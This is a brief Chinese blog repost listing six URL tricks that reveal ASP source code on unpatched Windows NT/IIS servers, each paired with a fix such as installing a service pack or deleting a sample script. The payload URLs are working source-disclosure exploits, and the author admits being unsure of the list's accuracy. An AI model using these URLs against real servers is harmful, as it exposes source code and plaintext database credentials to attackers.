偷看 ASP原码的6种方法 在没有打Services Pack6 补丁的NT server上,至少有6种方法可以看到ASP 程序的 源代码,它们是:
1、http://www.someserver.com/msadc/Samples/selectOR/showcode.asp?source=/msadc/Samples/SELECTOR/showcode.asp
解决方案:删除showcode.asp
2、http://somewhere/something.asp::$DATA
解决方案: 装sp3
3、http://somewhere/something.asp%2e
解决方案: 装sp4
or http://somewhere/something.asp.(加一个点)
解决方案: 装sp4
4、http://somewhere/something%2e%41sp
或者 http://somewhere/something%2e%asp
解决方案: 装sp4
5、http://somewhere/something.asp%81
解决方案:装sp6或者打补丁
6、http://somewhere/iissamples/exair/howitworks/code.asp?source=xxx.asp
最大的危害莫过于asp文件可以被上述方式读出;数据库密码以明文形式暴露在黑客眼前;
( x86: 不知道说的对不对,先贴出来给大家看看。)
来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10790690/viewspace-951612/,如需转载,请注明出处,否则将追究法律责任。
转载于:http://blog.itpub.net/10790690/viewspace-951612/